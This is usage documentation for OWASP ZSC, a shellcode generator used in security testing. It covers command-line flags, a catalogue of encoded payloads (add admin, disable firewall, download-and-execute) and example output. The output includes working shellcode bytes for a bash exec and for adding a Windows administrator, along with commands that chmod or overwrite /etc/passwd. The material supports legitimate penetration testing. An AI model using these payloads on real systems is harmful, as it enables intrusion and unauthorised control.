Command line ZSC
OWASP ZSC offers the possibility to generate shellcode directly from the command line or you can also use the interactive shell to drill-down the available ones,in this way, you can explore the options and features. If you are not familiar yet with ZSC, we recommend you to try out first the interactive shell to learn more about the payloads parameters and options.
Examples zsc from command line
To get a list of examples on how to use the command line use
zsc -e
[+] zsc.py --show-payloads
[+] zsc.py --show-payloads windows
[+] zsc.py -l php
[+] zsc.py --shell-storm search word1
[+] zsc.py -s search "word1 word2"
[+] zsc.py -s download id
[+] zsc.py -s download id -o shellcode.c
[+] zsc.py --payload windows_x86/system/mix_all --input "ls -la"
[+] zsc.py -p linux_x86/chmod/xor_random -i "/etc/passwd~~~777"
[+] zsc.py --payload osx_x86/system/none --input "ls -la" --assembly-code
[+] zsc.py -p linux_x86/write/inc -i "/etc/passwd~~~ali" -c
[+] zsc.py -p linux_x86/system/dec_15 -i "dir" --output shellcode.c
[+] zsc.py -p windows_x86/exec/add_0x4b5ff271 -i "calc.exe" -o shellcode.c
[+] zsc.py -p php/simple_hex -i "/path/file.php"
Featured Payloads
To get a complete list of all the payloads available use the following command
python zsc.py -l
This will output a complete list of all the features and options avaialble
[!] Note: Shellcode Payloads Sorted By OperatingSystem_Architecture/Function_Name/Encode_Name
[!] Note: Programming Languages Payloads Sorted By ProgrammingLanguagesName/Encode_Name
[!] system('command_to_execute')
[+] osx_x86/system/none
[!] chmod('file_to_perm','perm_number')
[+] osx_x86/chmod/none
[!] exec('file_to_execute')
[+] osx_x86/exec/none
[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue
[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue
[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue
[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue
[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue
[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue
[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue
[!] download_execute('download_url','filename','command_to_execute')
[+] linux_x86/download_execute/none
[+] linux_x86/download_execute/xor_random
[+] linux_x86/download_execute/xor_yourvalue
[+] linux_x86/download_execute/add_random
[+] linux_x86/download_execute/add_yourvalue
[+] linux_x86/download_execute/sub_random
[+] linux_x86/download_execute/sub_yourvalue
[+] linux_x86/download_execute/inc
[+] linux_x86/download_execute/inc_timesyouwant
[+] linux_x86/download_execute/dec
[+] linux_x86/download_execute/dec_timesyouwant
[+] linux_x86/download_execute/mix_all
[!] write('file_to_write','content')
[+] linux_x86/write/none
[+] linux_x86/write/xor_random
[+] linux_x86/write/xor_yourvalue
[+] linux_x86/write/add_random
[+] linux_x86/write/add_yourvalue
[+] linux_x86/write/sub_random
[+] linux_x86/write/sub_yourvalue
[+] linux_x86/write/inc
[+] linux_x86/write/inc_timesyouwant
[+] linux_x86/write/dec
[+] linux_x86/write/dec_timesyouwant
[+] linux_x86/write/mix_all
[!] file_create('filename','content')
[+] linux_x86/file_create/none
[+] linux_x86/file_create/xor_random
[+] linux_x86/file_create/xor_yourvalue
[+] linux_x86/file_create/add_random
[+] linux_x86/file_create/add_yourvalue
[+] linux_x86/file_create/sub_random
[+] linux_x86/file_create/sub_yourvalue
[+] linux_x86/file_create/inc
[+] linux_x86/file_create/inc_timesyouwant
[+] linux_x86/file_create/dec
[+] linux_x86/file_create/dec_timesyouwant
[+] linux_x86/file_create/mix_all
[!] dir_create('directory_to_create')
[+] linux_x86/dir_create/none
[+] linux_x86/dir_create/xor_random
[+] linux_x86/dir_create/xor_yourvalue
[+] linux_x86/dir_create/add_random
[+] linux_x86/dir_create/add_yourvalue
[+] linux_x86/dir_create/sub_random
[+] linux_x86/dir_create/sub_yourvalue
[+] linux_x86/dir_create/inc
[+] linux_x86/dir_create/inc_timesyouwant
[+] linux_x86/dir_create/dec
[+] linux_x86/dir_create/dec_timesyouwant
[+] linux_x86/dir_create/mix_all
[!] exec('file_to_execute')
[+] linux_x86/exec/none
[+] linux_x86/exec/xor_random
[+] linux_x86/exec/xor_yourvalue
[+] linux_x86/exec/add_random
[+] linux_x86/exec/add_yourvalue
[+] linux_x86/exec/sub_random
[+] linux_x86/exec/sub_yourvalue
[+] linux_x86/exec/inc
[+] linux_x86/exec/inc_timesyouwant
[+] linux_x86/exec/dec
[+] linux_x86/exec/dec_timesyouwant
[+] linux_x86/exec/mix_all
[!] download('download_url','filename')
[+] linux_x86/download/none
[+] linux_x86/download/xor_random
[+] linux_x86/download/xor_yourvalue
[+] linux_x86/download/add_random
[+] linux_x86/download/add_yourvalue
[+] linux_x86/download/sub_random
[+] linux_x86/download/sub_yourvalue
[+] linux_x86/download/inc
[+] linux_x86/download/inc_timesyouwant
[+] linux_x86/download/dec
[+] linux_x86/download/dec_timesyouwant
[+] linux_x86/download/mix_all
[!] script_executor('name_of_script','name_of_your_script_in_your_pc','execute_to_command')
[+] linux_x86/script_executor/none
[+] linux_x86/script_executor/xor_random
[+] linux_x86/script_executor/xor_yourvalue
[+] linux_x86/script_executor/add_random
[+] linux_x86/script_executor/add_yourvalue
[+] linux_x86/script_executor/sub_random
[+] linux_x86/script_executor/sub_yourvalue
[+] linux_x86/script_executor/inc
[+] linux_x86/script_executor/inc_timesyouwant
[+] linux_x86/script_executor/dec
[+] linux_x86/script_executor/dec_timesyouwant
[+] linux_x86/script_executor/mix_all
[!] system('command_to_execute')
[+] linux_x86/system/none
[+] linux_x86/system/xor_random
[+] linux_x86/system/xor_yourvalue
[+] linux_x86/system/add_random
[+] linux_x86/system/add_yourvalue
[+] linux_x86/system/sub_random
[+] linux_x86/system/sub_yourvalue
[+] linux_x86/system/inc
[+] linux_x86/system/inc_timesyouwant
[+] linux_x86/system/dec
[+] linux_x86/system/dec_timesyouwant
[+] linux_x86/system/mix_all
[!] chmod('file_to_perm','perm_number')
[+] linux_x86/chmod/none
[+] linux_x86/chmod/xor_random
[+] linux_x86/chmod/xor_yourvalue
[+] linux_x86/chmod/add_random
[+] linux_x86/chmod/add_yourvalue
[+] linux_x86/chmod/sub_random
[+] linux_x86/chmod/sub_yourvalue
[+] linux_x86/chmod/inc
[+] linux_x86/chmod/inc_timesyouwant
[+] linux_x86/chmod/dec
[+] linux_x86/chmod/dec_timesyouwant
[+] linux_x86/chmod/mix_all
[!] python
[+] python/simple_hex
[+] python/simple_hex_rev
[+] python/simple_base64_rev
[!] javascript
[+] javascript/simple_hex
[+] javascript/base64
[+] javascript/simple_hex_rev
[+] javascript/simple_base64_rev
[!] ruby
[+] ruby/simple_hex
[+] ruby/base64
[+] ruby/simple_hex_rev
[+] ruby/base64_rev
[!] php
[+] php/simple_hex
[+] php/base64
[+] php/simple_hex_rev
[+] php/base64_rev
[!] perl
[+] perl/simple_hex
[+] perl/base64
[+] perl/simple_hex_rev
[+] perl/simple_base64_rev
Selecting a payload
Based on this menu you can select a payload using the following command
zsc -p osx_x86/exec/none -i /bin/bash
P for the 'payload' and -i for parameter input , example:
when using parameters, be sure to set them between "parameter1"
if more parameters are required then use
"parameter1~~~parameter2"
This will generate the following shellcode:
[+] Generated shellcode is:
\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\x52\x51\x53\xb0\x3b\x6a\x2a\xcd\x80\xb0\x01\xb3\x01\xcd\x80
Another example with more parameters (add_admin requires username and password):
[!] add_admin('username','password')
[+] windows_x86/add_admin/none
The command line code:
zsc -p windows_x86/add_admin/none -i "mary~~~password"
Will create:
+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x90\x90\x64\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x68\x20\x2f\x61\x64\x68\x6d\x61\x72\x79\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x61\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x64\x64\x20\x26\x68\x64\x20\x2f\x61\x68\x73\x77\x6f\x72\x68\x20\x70\x61\x73\x68\x6d\x61\x72\x79\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x5c\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0